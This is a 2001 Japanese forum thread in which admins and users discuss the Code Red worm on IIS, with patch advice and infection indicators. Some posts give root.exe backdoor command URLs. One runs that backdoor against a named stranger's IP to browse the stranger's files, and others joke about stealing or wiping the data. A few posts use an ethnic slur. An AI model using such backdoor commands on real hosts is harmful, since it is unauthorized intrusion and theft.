コードレッド (Code Red) 逝ってヨシ

このエントリーをはてなブックマークに追加
300296
>>289
まちがった
301名無しさん@お腹いっぱい。:2001/08/08(水) 00:23
過去ログ読めとかかなり言われそうで嫌なんだけど、人多そうなので思い切って聞いてみる。
IISが動いているマシンだと放置しとくだけで感染してしまうのかしら?
302名無しさん@お腹いっぱい。:2001/08/08(水) 00:25
確実に増殖してるね。いずれ収束するんだろうか?
アタック元の管理者にかたっぱしから連絡しないと事態が収まらないような気がしてきた。
303名無しさん@お腹いっぱい。:2001/08/08(水) 00:25
>>301
IISに、インデックスサービス(これもデフォ)が入ってるとそうなる。
イントラ用ならルータで80切っとけばいいけど。
304名無しさん@お腹いっぱい。:2001/08/08(水) 00:26
>>298
漢字コード誤認識防止のおまじない文字列の1つ
けど実際にあれ選んでるのは初めて見た(w
305名無しさん@お腹いっぱい。:2001/08/08(水) 00:28
>>304
つーかあんなもん化けてもいいじゃないか(w
306名無しさん@お腹いっぱい。:2001/08/08(水) 00:28
>>302
@niftyだけど、とりあえず、昨日よりは少ない。
不精君でも、リブートするから、気が付くんじゃないか?
うちの会社は、遅ればせながら今日、社内総点検命令が出てました。
307名無しさん@お腹いっぱい。:2001/08/08(水) 00:28
要らないサービスは 入れない 付けない 起動させない
これ基本
308名無しさん@お腹いっぱい。:2001/08/08(水) 00:28
>>301
1.ネットワークからIIS+Indexサーバにアクセス可能
2.必要なパッチがあたっていない

以上の条件を満たしていたらアウトです。
ネットワークからってのは、インターネットから直接に限らず、
LAN内から侵入される可能性も大いにあります。
309もう:2001/08/08(水) 00:28
へへ見てちょ
www.nefty.net/desktop/haritsuke/imgboard.cgi
310名無しさん@お腹いっぱい。:2001/08/08(水) 00:28
>>301
過去ログ全部読めとは言わんが、せめて >>1 のリンク先
くらいは読めよ
311名無しさん@お腹いっぱい。:2001/08/08(水) 00:29
100MB のファイルを置いといたのに 56kB しか食べてくれなかった。
312名無しさん@お腹いっぱい。:2001/08/08(水) 00:29
>>299
だよねぇ、なのにある会社の管理部はイントラ内で
大繁殖したからって感染PC全部初期化命令を出しよった。
ローカルディスクを初期化しろってさぁ
いくら危機的でも対処方法があるのにねぇ
313名無しさん@お腹いっぱい。:2001/08/08(水) 00:30
2,3ヵ月後に又再発するに15おしりコイン
314名無しさん@お腹いっぱい。:2001/08/08(水) 00:31
>>311
 それ、面白い。俺もやろうかな、と思ったけど....
 やっぱ、無意味だよなあ。
315名無しさん@お腹いっぱい。:2001/08/08(水) 00:31
23時をまわったからダイヤルアップのアホどもも戦線に参加して来た。
316名無しさん@お腹いっぱい。:2001/08/08(水) 00:32
無意味というか、無駄なトラフィック増やしちゃイヤ
317293:2001/08/08(水) 00:33
>>295
再インストールしてもすぐ感染するから、パッチを当てないと駄目
>>299
パッチを当てようとしても、OSのバージョンアップしてないと、パッチが当たらないので、
サービスパックをダウンロードして、バージョンアップして、パッチを当てて、というのが、ものすごいじかんがかかる。
318311:2001/08/08(水) 00:34
いや、Code Red がバッファオーバーフローしないかなと思ってサ...
319管理部:2001/08/08(水) 00:34
>>312
つーかバクドア削除してレジストリ戻して、なんて複雑な作業
できる奴のPCは総じてきっちり防衛できてて、パッチて何?
っていってるようなマヌーな奴のPCが軒並みやられてるわけよ。
でオフィシャル指示としては「感染したら初期化しろ」になったさ。
手順書つくれぇ?アホかーーーーーい。
おまえらの不始末までなんで俺らがかぶらにゃならんのってことよ。
320名無しさん@お腹いっぱい。:2001/08/08(水) 00:35
>>315
テレホタイムはプロバイダの担当者帰っちゃってるだろうから
朝までログ集めて、まとめて送り付けて対策しろって言おうかな。
321追加:2001/08/08(水) 00:35
>>317
今の状態だと、そーやって再インストールしてる間に感染。
322名無しさん@お腹いっぱい。:2001/08/08(水) 00:36
なんか、不思議だよな>ダイアルアップ
前回のアクセスからリブートしていないわけないと思うから
再感染なのかな。
323名無しさん@お腹いっぱい。:2001/08/08(水) 00:38
>>319
じつはこの話、ちゃんとした情報処理の会社なんだけどね
しかも超大手・・・
324>>321:2001/08/08(水) 00:39
インストール中はケーブルはずせやゴルァ
325293:2001/08/08(水) 00:39
>>317
それ以前に、英語が分からなくて、パッチが当てられない人が大多数だと思うぞ。
パッチなんて、素人が当てるとは想定してないからな。
326名無しさん@お腹いっぱい。:2001/08/08(水) 00:39
バッチを落としてる間に感染したら終わりじゃないのか?
初心者はバッチをメディアに保存して再インストールだな。
CodeRedの駆除法教えてください厨房に説明するのは疲れそう。
327名無しさん@お腹いっぱい。:2001/08/08(水) 00:40
>>319
よく考えたら、IIS動かす必要のない奴に関しては
「IIS止めれ」
で済むのでは。バックドアもIIS経由だし。
328管理部:2001/08/08(水) 00:40
>>323
オレがその大手の管理部だって発想はない?
329名無しさん@お腹いっぱい。:2001/08/08(水) 00:41
>>328
ご愁傷さまです。
330追加:2001/08/08(水) 00:42
>>324
えぇだって、パッチはサーバに有るじゃん。
てか、DHCPサーバ探すのに時間がかかるしぃ。
やだ、やだ、えらそうにぃ。
って言われる会社に1票
331名無しさん@お腹いっぱい。:2001/08/08(水) 00:43
せっかく感染してるのだから、バックドアつかって直すとか。
332>:2001/08/08(水) 00:44
The Internetから切れ>感染馬鹿
333名無しさん@お腹いっぱい。:2001/08/08(水) 00:44
ほんとご苦労様です。
でも12時間もネット止ると仕事にならんよ
原因の通知だって、翌朝だし
334名無しさん@お腹いっぱい。:2001/08/08(水) 00:45
>>331
もち社内だけね
335名無しさん@お腹いっぱい。:2001/08/08(水) 00:45
そろそろ飽きてきたから、完全に消滅するか
面白い亜種をリリースするかどっちかにしろとか
思ってる俺は逝ったほうがいいかな?
土曜21時ぐらいが一番楽しかったんだが
336>>330:2001/08/08(水) 00:45
IndexServerとisapi殺しとけ
337ななしさん@カレーうまい:2001/08/08(水) 00:47
なんでみんなせっかく感染してるマシンをばらしちゃうかなぁ。
もったいないよ?
338管理部:2001/08/08(水) 00:48
>>331
それも考えたが、root.exeの場所を探すコード書くのは
意外と面倒だ。D:、E:あたりにInetPubがあるならまだしも、
M:とかQ:とかに配置してるような変態まで対処する気にはならん。
339名無しさん@お腹いっぱい。:2001/08/08(水) 00:52
>>337
踏み台か、暗号コンテストにしか使えないマシンたちです。
340管理部:2001/08/08(水) 00:53
気が付いて速攻削除して知らんふり決め込んでる奴もいるしな。
気持ちはわからんでもないが、防衛できたマシンにはアタック
ログばっちり残ってるんだからさ。ムダムダ。
341名無しさん@お腹いっぱい。:2001/08/08(水) 00:55
アタックされたログを公開するのって法的に問題ありますか?
エロ動画ダウソ速度が落ちてプソプソなので晒してやりたいのですが。
342名無しさん@お腹いっぱい。:2001/08/08(水) 00:57
あの〜これってWIN2000とNTに感染するの?
っ〜うかマジでうぜえんだよ!!!!!
343名無しさん@お腹いっぱい。:2001/08/08(水) 00:58
>>342
いっつ つー れいと。
344名無しさん@お腹いっぱい。:2001/08/08(水) 00:58

★2chが常時IP取ってる証拠?★
http://kaba.2ch.net/news/kako/994/994154317.html

以下の情報を記録させていただきました。
http://usagi.tadaima.com/2chbbs/subback.html
345名無しさん@お腹いっぱい。:2001/08/08(水) 00:58
これってポートアタック以外に感染するって事あるんですか?
80さえブロックすればイントラはOKなはずですよね?
346名無しさん@お腹いっぱい。:2001/08/08(水) 00:59
>>340
うちでは、ダイアルUP接続馬鹿が居て、そいつがLAN内に持ち込んだ
ようなんだが、退職者のサーバに電源いれてそれが原因かのように言ってる。
ウィルスじゃなくて、ワームなんだってことに気が付かない言い訳が、哀愁
を誘うなり。
347>:2001/08/08(水) 00:59
348名無しさん@お腹いっぱい。:2001/08/08(水) 01:00
>>344
IPは公開するものだ。
349名無しさん@お腹いっぱい。:2001/08/08(水) 01:01
AT&Tしっかりしてくれ。すさまじいアタック食らってんだよ
350名無しさん@お腹いっぱい。:2001/08/08(水) 01:01
>>342 バックドアからやりたい放題だということはこの板を見れば
明白。未必の故意で捕まります。
351名無しさん@お腹いっぱい。:2001/08/08(水) 01:03
>>346
人のせいにするやつ信用できない残念だけどクビ。
352管理部:2001/08/08(水) 01:03
同じ会社のような気がしてきたぞ(笑
収集できたログの発動時間からしてダイアルアップ経由感染と踏んでるぜ。
353名無しさん@お腹いっぱい。:2001/08/08(水) 01:03
NT4はSRPを入れれば大丈夫みたいやね
http://www.microsoft.com/japan/technet/security/nt4srp.asp
354名無しさん@お腹いっぱい。:2001/08/08(水) 01:04
>>350
誤爆?
355ななしさん:2001/08/08(水) 01:05
誰かそろそろ、全ネットワークがストップしたあのアホな会社を晒してくれ。
356名無しさん@お腹いっぱい。:2001/08/08(水) 01:05
Win2kもproはデフォじゃ感染しないみたいだし、一般ユーザーは取り合えず安心ですね。
357名無しさん@お腹いっぱい。:2001/08/08(水) 01:05
なんだかチャット状態ですね。
358もう:2001/08/08(水) 01:05
みんな見てくれよ〜ぶらくらじゃないから
http://www.nefty.net/desktop/haritsuke/imgboard.cgi
359名無しさん@お腹いっぱい。:2001/08/08(水) 01:06
>>356
気が付かないうちに IIS インストールされてる Win2Kプロ
が沢山攻撃に参加してると思うのだが。
360名無しさん@お腹いっぱい。:2001/08/08(水) 01:07
>>355
全サーバーWINで組むような駄目ネットワークは絶滅危惧種
361350:2001/08/08(水) 01:07
誤爆スマソ >>341 宛てでした
362名無しさん@お腹いっぱい。:2001/08/08(水) 01:07
>>359
ちょっと不安になってきたんだけど、人のマシンに気づかれないようにIISインストなんてできるの?
363え〜ん:2001/08/08(水) 01:08
だからあ、コンピューターの管理でサービスとアプリケーションの
下になんかない?
364名無しさん@お腹いっぱい。:2001/08/08(水) 01:09
>>362
くとうてんがちがうのであつた
365名無しさん@お腹いっぱい。:2001/08/08(水) 01:10
>>355
どこどこ?
366名無しさん@お腹いっぱい。:2001/08/08(水) 01:10
>>363
インデックスサーバーがありますね。
これが停止していればOKです。
367359:2001/08/08(水) 01:12
>>362
わかりにくくてスマソ。

IIS がインストールされていることに気が付いていない
Win2K Pro ユーザーが沢山いるだろうな、という意味。
368え〜ん:2001/08/08(水) 01:12
>>366
デフォルトで停止してる?
369管理部:2001/08/08(水) 01:13
>>366
停止しててもだめだよ。
370名無しさん@お腹いっぱい。:2001/08/08(水) 01:14
>>366
違う!
index service 動いてる動いてないは関係ないぞ。
371名無しさん@お腹いっぱい。:2001/08/08(水) 01:14
Win2kProってデフォルトじゃIISはインストールされないでしょ?
素人はサービス追加したり弄ったりしないだろうからまず大丈夫。
コンピュータの管理>サービスとアプリケーション>サービス>インデックスサービスが停止してれば問題なし。
これが開始になってると非常にまずい。
372名無しさん@お腹いっぱい。:2001/08/08(水) 01:14
default.idaあるないですね。
373え〜ん:2001/08/08(水) 01:14
>>369
そうすよね!!
誰も気づいてくれないんだもの。
374名無しさん@お腹いっぱい。:2001/08/08(水) 01:15
>>372
default.idaのパスは?
375名無しさん@お腹いっぱい。:2001/08/08(水) 01:15
>>367
恥ずかしながら私がそうでした。
遅ればせながら対応しました。
無事でよかったけど・・・。
376名無しさん@お腹いっぱい。:2001/08/08(水) 01:16
>>371
違うっつーのよ。いいかげんな情報流すな!
377え〜ん:2001/08/08(水) 01:16
だってan httpd立てようとした時「80は使われてます」って出たもの。
378名無しさん@お腹いっぱい。:2001/08/08(水) 01:18
default.idaは無くてもidq.dllに渡されてしまうからだめ。
.idqと.idaに対するidq.dllへの割り付けを消してしまうかしないと。
379名無しさん@お腹いっぱい。:2001/08/08(水) 01:18
もし感染してたとして
IISをアンインストールすればOK?
380名無しさん@お腹いっぱい。:2001/08/08(水) 01:19
>>366
本当にOK? うちではインデックスサービスが停止していても、
DLLが残ってると入り込めるらしいという情報が流れているのだが。
381372:2001/08/08(水) 01:20
>>378
陳謝。
382管理部:2001/08/08(水) 01:20
>>379
おまえみたいな奴があとからあとから出てきてこっちの仕事は
停滞しっぱなしだ。
383名無しさん@お腹いっぱい。:2001/08/08(水) 01:20
サービスとアプリケーションの下層にインデックスサービスがあるんですけど中身が空なら安全ですか?
384名無しさん@お腹いっぱい。:2001/08/08(水) 01:20
idq.dllのリネームで済まないか?
385名無しさん@お腹いっぱい。:2001/08/08(水) 01:21
>>379
とめとけばあんまり良くないけどひとまずOk。
ただしSystem File ProtectionがOffになったまま。
386名無しさん@お腹いっぱい。:2001/08/08(水) 01:21
>>379
全然ダメ。
387名無しさん@お腹いっぱい。:2001/08/08(水) 01:22
>>384
それならパッチ当てたほうがいい
388ななし:2001/08/08(水) 01:22
>>366
今回はこういう方達の大量感染なんで
どうにもならんでス。

                  /)
             、2)Y⌒  ⌒フ   +
           ッ-i'´       ⌒フ
           (´ ,.-゙ー-、     ろ、
        * シ彡ノ"ミVv    )
      *    ノノノノ"ヽヽヽミ   シ  / ̄ ̄ ̄ ̄ ̄
.          ,l')∩  ∩ |)|ヾ ミ  < 逝ってよし
           ,○)、 ▽  ノjl| YY゙    \_____
           {_∃ `l____/⌒'i|
            ̄ Yl"゙⌒lY |  +
              ,ト|__/ハ i、
           ,iニiニiニユ ゙h,,)
           ノtYTYヾ\
          /''フ''''ー<"ヽ、
           /__ノ     \ノヽ、
          (__)     ゞ__)
389名無しさん@お腹いっぱい。:2001/08/08(水) 01:22
>>386
ありゃ、Backdoor到達できたっけ?
390管理部:2001/08/08(水) 01:23
>>384
ida/idqマッピング解除してScriptsを消せ。
実行権解除でもいいぜ。
391え〜ん:2001/08/08(水) 01:23
>>388
かわいい〜
392名無しさん@お腹いっぱい。:2001/08/08(水) 01:24
結局、ごちゃごちゃいわずに手順どおりにやれってことになるわけだ。
393名無しさん@お腹いっぱい。:2001/08/08(水) 01:26
>>390
なるほど、実行権は確かに楽だ。まあIISなんていう
ステキなHTTPDは触ったことも無いんで、実は関係無いんだが
394名無しさん@お腹いっぱい。:2001/08/08(水) 01:27
ワームの削除方法:


1. 次のWebサイトから修正プログラムをダウンロードして入手し、適用します:

http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS01-033(日本語)

http://www.microsoft.com/technet/security/bulletin/MS01-033.asp(英語)
395え〜ん:2001/08/08(水) 01:27
これで一人減ったんでよかった。

-------ここまで読んだ---------
もう寝る。
396名無しさん@お腹いっぱい。:2001/08/08(水) 01:28
/ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
| あしたまでに全部駆除しといて。

   ̄ ̄ ̄|/ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
  ∧_∧       / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
  ( ・∀・)  ∧ ∧ < もう、手詰まりです。
 (  ⊃ )  (゚Д゚;)  \____________
 ̄ ̄ ̄ ̄ ̄ (つ_つ__
 ̄ ̄ ̄日∇ ̄\| BIBLO |\
        ̄   =======  \
397名無しさん@お腹いっぱい。:2001/08/08(水) 01:29
398名無しさん@お腹いっぱい。:2001/08/08(水) 01:31
iij大丈夫か?、、、
もう10件も来てるぞ
399名無しさん@お腹いっぱい。:2001/08/08(水) 01:31
いいかげんなこと言う前に >>1>>2 のリンク先は読んでくれよ...
400名無しさん@お腹いっぱい。:2001/08/08(水) 01:31
そう言われるといいかげんなこと言いたくなるな
401名無しさん@お腹いっぱい。:2001/08/08(水) 01:33
他のとこは勢い落ちてるのかな
俺んとこは、Win2kダイヤルアップOCNで
2時間半で230件ぐらい来てる。早く鎮まって欲しい・・・
402名無しさん@お腹いっぱい。:2001/08/08(水) 01:34
>>397 うぉ、一気に書き換わってる。
403名無しさん@お腹いっぱい。:2001/08/08(水) 01:35
>>397
普段の低姿勢が無くなって、ちょいちょいと怒りが現れているね。
404( ´∀`)さん:2001/08/08(水) 01:36
       / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄\
       |  IISが起こす昔からの騒動を見ていると        |
  ∩_∩  |                                |
 (´ー`) <  IIS自体がバックドアであるような気がするよ    |
 (   ) \____________________/
  | | | 
 (___)__)
405厨房:2001/08/08(水) 01:36
インデックスサービスってアンインストできるの?
サービスにIndexing Serviceっていう名前で入ってるんだけど、開始にはなってないが・・・
406名無しさん@お腹いっぱい。:2001/08/08(水) 01:37
>>405

1に戻って以下読み直し。
407名無しさん@お腹いっぱい。:2001/08/08(水) 01:38
>>397
でも HTTP のリクエストを攻撃パケットと呼ぶのは違和感ある...
408名無しさん@お腹いっぱい。:2001/08/08(水) 01:39
>>405
できるけどしても意味ない
409厨房:2001/08/08(水) 01:42
>>406
一応過去ログは読んで、MSの修正プログラムをインストしたりして感染自体はしてないんですけどね、
Indexing Serviceのアンインストは過去ログにはなかったと思ったんですけど

>>408
意味無いの?やり方だけでも教えくれないかな・・・
410名無しさん@お腹いっぱい。:2001/08/08(水) 01:43
>>409
390みてください。
411名無しさん@お腹いっぱい。:2001/08/08(水) 01:42
http://www.symantec.com/region/jp/securitycheck/codered_secutitycheck.html
ここでチェックソフト落としてチェックしてみた。

your computer does not appear to be vulnerable to the codered warm
と出たけど、英語わからん・・・。
coderedに弱くない?問題ないって事でええんかのー。
412名無しさん@お腹いっぱい。:2001/08/08(水) 01:44
いや〜出始めの頃に落とされて良かったよ>NNNNの頃

会社の社員が使っているIISマシン落ちてやんの。
SRP入れたから良いけど。
413名無しさん@お腹いっぱい。:2001/08/08(水) 01:44
>>411
さいです
414名無しさん@お腹いっぱい。:2001/08/08(水) 01:46
your computer does not appear to be vulnerable to the codered warm

アンタのPCにはCodeRedに対する脆弱性が見つからなかった
415名無しさん@お腹いっぱい。:2001/08/08(水) 01:46
>>411
does notくらい読めるやろー
416名無しさん@お腹いっぱい。 :2001/08/08(水) 01:47
http://www.reasoning.org/jp/security_alerts/hashsa-2001-02.html

一部転載させてもらおう

>(Code Red II に)感染したホストについて は修正パッチを適用し再起動する(Code Redに対する対処)だけでは
>まったく 不十分であり、レジストリ値の変更等も必要になる。また、こうした対処を しても、既にバックド
>アを悪用された可能性もあり、システムの全面的かつ 徹底的なチェックが必須である。それが難しい場
>合は、全面的な再インストール を行なうことが強く推奨される。
417一発予想:2001/08/08(水) 01:53
次のターゲットは、やっぱりこれ?
http://www.zdnet.co.jp/news/0108/07/e_ie.html
#すまん、デマはよそう。
418名無しさん@お腹いっぱい。:2001/08/08(水) 01:53
WIN2Kでインターネットにつないでしまった不幸なあなたに送る
バックドア検出ツール
http://localhost/scripts/root.exe?/c+net+send+localhost+やられてますよ
419名無しさん@お腹いっぱい。:2001/08/08(水) 01:54
>>416のリンクが一番分かりやすい。
ここでごちゃごちゃいってる奴らははっきり言って要領を得ない。
420名無しさん@お腹いっぱい。:2001/08/08(水) 01:54
ワラタ
421管理部:2001/08/08(水) 01:55
>>418
なるほどこりゃいいね。
422名無しさん@お腹いっぱい。:2001/08/08(水) 01:55
そろそろ次の展開がほしーな
だれか殺虫剤ワーム作ってくれー
名前はアースレッドでよろしく
423名無しさん@お腹いっぱい。:2001/08/08(水) 01:56
>>419
・・・みんな君に解説してる訳じゃないんでね
424名無しさん@お腹いっぱい。:2001/08/08(水) 01:57
まあ、誤解しがちな点が解決されたんではないか?
ましな情報源のをちゃんと読めという話は確かだが。
425名無しさん@お腹いっぱい。:2001/08/08(水) 02:00
426名無しさん@お腹いっぱい。:2001/08/08(水) 02:00
>>418 おお、いいんじゃないですか。
パート2立てるときは1に載っけといてよ。
# 「やられてますよ」って日本語じゃだめなんかな。
427411:2001/08/08(水) 01:59
>>414
サンクス!

>>411
すまん、よめんのだ!バカなのだー。
でも、こんなバカの管理してるサーバーが大丈夫なのに、感染してる
サーバーが多いのは信じられないなー。
428名無しさん@お腹いっぱい。:2001/08/08(水) 02:01
まとめると
SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\VirtualRoots\Scripts
SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\VirtualRoots\msadc
SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\VirtualRoots\c
SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\VirtualRoots\d
のレジストリキーが存在、あるいは
c:\explorer.exe
d:\explorer.exe
c:\inetpub\scripts\root.exe
c:\Program Files\Common Files\System\MSADC\root.exe
が存在していれば感染。
タスクマネージャのプロセスにInetinfo.exeが存在(IISがインストール済且つ動作中)すればパッチを当てる必要有り。
パッチを当てるにはSP2インストール必要有り。

ってことでよろしいですね。
429名無しさん@お腹いっぱい。:2001/08/08(水) 02:03
まとめてくれたのはありがたいんだが 15 分後には同じ質問が
出るよ、この回り具合だと。
430名無しさん@お腹いっぱい。:2001/08/08(水) 02:03
>>418

http://localhost/scripts/root.exe?/c+net+send+localhost+やられてますよ
って感染してても表示されない気がする
431名無しさん@お腹いっぱい。:2001/08/08(水) 02:04
>>428
万能backdoorありってことは、

・ログを消して(通用するのは休眠サーバだけだが)
・レジストリキーもそれなりに戻して、
・別のバックドア仕掛けてドロンジョ(古っ!!)

なんてことはないか?
432名無しさん@お腹いっぱい。:2001/08/08(水) 02:04
厨房がUnixでWebサーバー立てる時代だからね
433名無しさん@お腹いっぱい。:2001/08/08(水) 02:05
>>431
explore.exeなんて目立つ名前じゃないと発見少しは遅れるかな?
434名無しさん@お腹いっぱい。:2001/08/08(水) 02:05
別のバックドア、トロイの危険性があるから
素人は素直に再インストールしろっての
435名無しさん@お腹いっぱい。:2001/08/08(水) 02:07
さらにまとめるとWindows2000Pro.インストールしたまんまの状態ならIISは動作してないので問題なし。
不安ならバッチあてればなおよし。
Serverはデフォルトでバッチ当てる必要有り。

ってことでよろしいですね。
436名無しさん@お腹いっぱい。:2001/08/08(水) 02:08
>>431
もちろんある。
rootkit の類を植えられてる可能性あるし、不安なら再インストール!
なのだが、厨房管理者はその辺神経質にならないから
問題なんだな。
437503:2001/08/08(水) 02:10
>>428 まさかとは思うが、MeでExplorer.exe削除する奴は居ないよな。
NTと2000のIISは注意だけど。
438名無しさん@お腹いっぱい。:2001/08/08(水) 02:11
>>435
IIS 動作させちゃうアプリってあるんじゃなかったっけ?
FrontPage とかどうだっけ
あとは Visual InterDev とか
439名無しさん@お腹いっぱい。:2001/08/08(水) 02:12
>>438
IISを動作させるアプリをまとめて、これ使ってる人要注意みたいな感じで喚起するといいかもしれませんね。
440名無しさん@お腹いっぱい。:2001/08/08(水) 02:14
>>473
ワラタ
ってーかMeや98にも感染するの?
441非管理部:2001/08/08(水) 02:15
>>360
> 全サーバーWINで組むような駄目ネットワークは絶滅危惧種
だったら保護して増やさなきゃ。
442名無しさん@お腹いっぱい。:2001/08/08(水) 02:15
>>440
443名無しさん@お腹いっぱい。:2001/08/08(水) 02:15
>>441
隔離
444名無しさん@お腹いっぱい。:2001/08/08(水) 02:16
NT = rootkit
445名無しさん@お腹いっぱい。:2001/08/08(水) 02:17
>>441
TCP/IP禁止。全部NETBEUIに戻す。
446438:2001/08/08(水) 02:18
>>439
そうだね。うちは FrontPage とか無いので検証できないので、
知ってる人いたら教えてください。

とりあえず、>>435 は Win2KPro でもタスクマネージャで
確認、としておいたほうが良い気がする。
447名無しさん@お腹いっぱい。:2001/08/08(水) 02:20
>>445
NetBeuiごしに感染するワームなかったか?
東急CATVで流行ったやつ。
448非管理部:2001/08/08(水) 02:21
一寸の赤虫にも五分の魂。
449418:2001/08/08(水) 02:21
>>430
あれをあそこにああいうふうにコピーして実験した結果は
OKだったけどそんな簡単なもんじゃないんだっけ?
450名無しさん@お腹いっぱい。:2001/08/08(水) 02:22
うちのネットワークNetBeui禁止だよ。
何考えてんだか。
451名無しさん@お腹いっぱい。:2001/08/08(水) 02:22
>>447
あいたたたた
452名無しさん@お腹いっぱい。:2001/08/08(水) 02:24
>>450
ただただIPつなぐなというたわごとでした。マジレスすまん。以上。
453名無しさん@お腹いっぱい。:2001/08/08(水) 02:25
>>446
そうですね。次スレ(あるのか?)の>>1にまとめましょう
454名無しさん@お腹いっぱい。:2001/08/08(水) 02:33
ことあるごとに「Dialウプだめ」「RASだめ」と、ささやかな
我々の要望をうち砕く本社/親会社の情報システム部。
まさかCodeRedごときにやられたりはしませんよねぇ(w

さあ、CodeRedを見事に撃退した彼らの奮闘ぶりをたたえまくろう!

…ちゅう新スレをチクリ板に上げたいと思うが、どうよ?
455名無しさん@お腹いっぱい。:2001/08/08(水) 02:34
>>454
どこどこ?
456名無しさん@お腹いっぱい。:2001/08/08(水) 02:35
>>449
うちのだとlocalhostあてのnet sendは届かない。
 マシン名を指定すると届くけど。
457名無しさん@お腹いっぱい。:2001/08/08(水) 02:36
漏れはユーザだが、けなすことより動かすことを考えようという気になった。
今日は寝るざんす。
458名無しさん@お腹いっぱい。:2001/08/08(水) 02:36
>>454
CodeRedがらみのちくりスレは一つはあってもいいとおもう
459名無しさん@お腹いっぱい。:2001/08/08(水) 02:37
>>457
管理者さんはエラいということざんす(人によるが)。でわ。
460名無しさん@お腹いっぱい。:2001/08/08(水) 02:41
ありゃ?
24.49.*.*
なんてとこから来たよ。
210ばっかりだったのに。
461名無しさん@お腹いっぱい。:2001/08/08(水) 02:42
 これで日本は(韓国も同じだが)サイバーテロ仕掛け
れば一発で御陀仏、お役所もマスコミも無力だと証明で
きたね。「ならず者国家」もブッシュ大統領も大喜びさ
462名無しさん@お腹いっぱい。:2001/08/08(水) 02:48
>>461
遊びに使ってるのが殆どだからそれほどこまりまセーン。
463名無しさん@お腹いっぱい。:2001/08/08(水) 02:51
やべ、210.91.32.2 の X 型から連続攻撃食らってる。
3秒間で連続23回+8秒後に最後の一回アクセスがあった。
こんなの初めて見るんだけど新種?
464名無しさん@お腹いっぱい。:2001/08/08(水) 02:54
かなりアタックが来てますね・・・
うちはMacのWeb共有というへぼい自家鯖ですが。
ログを見てると数分に一回は来ます。
主に中国系のサーバを媒介としているようです。
465名無しさん@お腹いっぱい。:2001/08/08(水) 02:55
TCP Port6345に沢山おいでになってますが、何のバックドアやら。
昨日の昼はUDPだった。知ってもどうにもならんが。
466465:2001/08/08(水) 02:56
6346の間違い。
467名無しさん@お腹いっぱい。:2001/08/08(水) 03:02
>>466
どこかで見たようなPort番号…
と思ったら、それgnutellaですよん。
468某CATVユーザー@お腹いっぱい。:2001/08/08(水) 03:03
某CATVユーザーなんですが、自分のプロバのサポートに、
警告対応メールよろしくと言っても返事ないです(T_T)
(zonealarm警告が多発しているのに)
469名無しさん@お腹いっぱい。:2001/08/08(水) 03:05
hinet.net にはログを送った。
470名無しさん@お腹いっぱい。:2001/08/08(水) 03:05
>>467
Thanks。
なんだ、たいしたモンじゃないな (藁
到って禁欲的にしか使用してないもんで・・・
471名無しさん@お腹いっぱい。:2001/08/08(水) 03:09
http://210.219.128.95/scripts/root.exe?/c+dir+"f:\XXX"
えろいのばっかもってる
472名無しさん@お腹いっぱい。:2001/08/08(水) 03:10
今なら、root.exeでWeb改竄して自己主張し放題なのだろうか。。。
宗政分離マンセー
KomeiRed
473名無しさん@お腹いっぱい。:2001/08/08(水) 03:12
>>471
デリっておやり
474名無しさん@お腹いっぱい。:2001/08/08(水) 03:14
うちの apache に攻撃にきてるワームの元 IP、jp domain だけ調べると
.ad.jp, .ne.jp, (常時接続ユーザっぽい)、
.co.jp ばかりで、
.gr.jp, ac.jp がほとんど無い。
貧乏人は今回はほとんど攻撃を受けなかったのだろう
大学はほとんど IIS 使ってないのかな。
475名無しさん@お腹いっぱい。:2001/08/08(水) 03:14
>>471
入手したいが方法がわからん(藁
476名無しさん@お腹いっぱい。:2001/08/08(水) 03:16
>>475
wwwrootにコピって
httpから落としたら?
477名無しさん@お腹いっぱい。:2001/08/08(水) 03:17
>>471
D:\にも魅力的なファイル名がいっぱい
478名無しさん@お腹いっぱい。:2001/08/08(水) 03:17
>>471
入手しようとしたがファイルでかすぎ。
というかアクセス集中してんのか (藁
479名無しさん@お腹いっぱい。:2001/08/08(水) 03:17
>>474
東大のNTサーバはIISだよ。
480名無しさん@お腹いっぱい。:2001/08/08(水) 03:18
旦那の知らないところで妻がもてあそばれているというヤツですな。
481名無しさん@お腹いっぱい。:2001/08/08(水) 03:19
>>478
アクセスが集中してるっつーか、増殖に忙しいんでは?
っつーか、ヤメトケヨー。
482名無しさん@お腹いっぱい。:2001/08/08(水) 03:20
むかつくからフォーマットかけようか
ntldrを削除か迷いますなぁ
483名無しさん@お腹いっぱい。:2001/08/08(水) 03:20
謝罪と賠償を要求されるぞ(w
484名無しさん@お腹いっぱい。:2001/08/08(水) 03:20
>>481 すまん、思わず手が出た (藁
485名無しさん@お腹いっぱい。:2001/08/08(水) 03:20
>>478
得ろ画像サービスなんてそんなもんか・・・
486名無しさん@お腹いっぱい。:2001/08/08(水) 03:21
>>483
つーか、CodeRedにやられる奴がそこまでするか?
しかもやられたのがエロ動画
泣き寝入りっしょ
487名無しさん@お腹いっぱい。:2001/08/08(水) 03:22
何とか TERUMI 画像と置き換える方法を考え中...
488名無しさん@お腹いっぱい。:2001/08/08(水) 03:22
Name: s210-219-128-95.thrunet.ne.kr
Address: 210.219.128.95

krだぞkr(w
489名無しさん@お腹いっぱい。:2001/08/08(水) 03:23
>>479
そうか、やっぱ金持ち大学は違うな(藁
490名無しさん@お腹いっぱい。:2001/08/08(水) 03:24
こいつSM好き?
金沢文子まであるよ
491名無しさん@お腹いっぱい。:2001/08/08(水) 03:26
>>488
じゃ犯っちゃってOK?
492名無しさん@お腹いっぱい。:2001/08/08(水) 03:26
>>486
まぁ、個人ユーザならそうかもしれんが、企業だったり
なんらかの団体が管理しているマシンだと要求されても
おかしくないと思われ。

企業はダメー、個人ならオケーってことではないので、念のため。
493名無しさん@お腹いっぱい。:2001/08/08(水) 03:27
在韓日本人か?
それとも日本かぶれのチョン
494名無しさん@お腹いっぱい。:2001/08/08(水) 03:27
火事場泥棒はヤメレ。マジデ。
